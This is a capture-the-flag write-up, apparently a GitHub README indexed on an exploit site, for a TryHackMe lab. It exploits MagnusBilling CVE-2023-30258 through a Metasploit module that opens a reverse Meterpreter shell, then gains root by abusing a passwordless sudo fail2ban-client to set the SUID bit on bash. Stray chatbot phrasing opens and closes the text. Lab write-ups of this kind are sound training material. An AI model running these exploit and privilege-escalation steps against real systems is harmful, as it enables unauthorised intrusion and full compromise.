Exploit for OS Command Injection in Magnussolution Magnusbilling CVE-2023-30258

Name: Exploit for OS Command Injection in Magnussolution Magnusbilling CVE-2023-30258
Rating: 5 (95 reviews)
2026-04-08 | CVSS 9.8
## https://sploitus.com/exploit?id=F28826C1-F5C5-5AE0-BE50-6336FBF9943C
# THM-MagnusBilling-CVE-2023-30258
Perfect! Let’s convert your full write-up into professional English, ready for a GitHub repository. I’ve also polished it for clarity and readability — this is portfolio-level material.

⸻

🛡️ MagnusBilling RCE → Root (CVE-2023-30258)

📌 Overview
	•	Target: 10.145.148.203
	•	Platform: TryHackMe
	•	Vulnerability: CVE-2023-30258
	•	Access: Unauthenticated Remote Code Execution (RCE)
	•	Privilege Escalation: fail2ban misconfiguration
	•	Final Access: Root

⸻

🔍 1. Reconnaissance

Port Scan

rustscan -a 10.145.148.203

📊 Open Ports

Port	Service
22	SSH
80	HTTP
3306	MySQL
5038	Asterisk


The presence of Asterisk hints at a VoIP/billing system.

⸻

🌐 2. Web Enumeration

Directory Fuzzing

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt \
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c

📁 Findings:
	•	/archive
	•	/assets
	•	/lib
	•	/tmp
	•	/protected


The /mbilling path is identified as a potential attack vector.


⸻

🚨 3. Vulnerability Identification

CVE-2023-30258

MagnusBilling is vulnerable to:
	•	Unauthenticated Remote Code Execution (RCE)
	•	Command Injection
	•	Full system compromise

⸻

💣 4. Exploitation (Metasploit)

msfconsole

search CVE:2023-30258

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run




⸻

🎯 Result

meterpreter session opened

sysinfo

OS: Linux Debian
User: asterisk



⸻

🔐 5. Initial Access

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

whoami

asterisk

⸻

🏁 6. User Flag

cd /home/magnus
cat user.txt

⸻

🔎 7. Privilege Escalation

Check sudo

sudo -l

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Critical misconfiguration detected!




⸻

💣 8. Exploiting Fail2Ban

Add a malicious action

sudo fail2ban-client set mbilling_login addaction evil

sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"

sudo fail2ban-client set mbilling_login banip 127.0.0.1





⸻

🚀 9. Root Access

/bin/bash -p

id

euid=0(root)

Initially whoami returned asterisk. Using bash -p escalates to root.



⸻

👑 10. Root Flag

cat /root/root.txt

⸻

🧠 11. Key Takeaways
	•	CVE exploitation provided easy initial access
	•	Web enumeration is critical (ffuf identified /mbilling)
	•	Misconfigured sudo can lead to full system compromise
	•	fail2ban can be abused for privilege escalation

⸻

🛡️ 12. Mitigation
	•	Update MagnusBilling to the latest version
	•	Remove NOPASSWD from sudo configuration
	•	Restrict access to fail2ban-client
	•	Harden web applications and endpoints

⸻

💀 Conclusion

This machine demonstrates a realistic attack chain:

Web RCE → Shell → Privilege Escalation → Root

A combination of vulnerability + misconfiguration led to full system compromise.


If you want, I can also make a full portfolio README that lists this and all your future labs professionally, so your GitHub looks like a pentester’s portfolio.

Do you want me to do that next?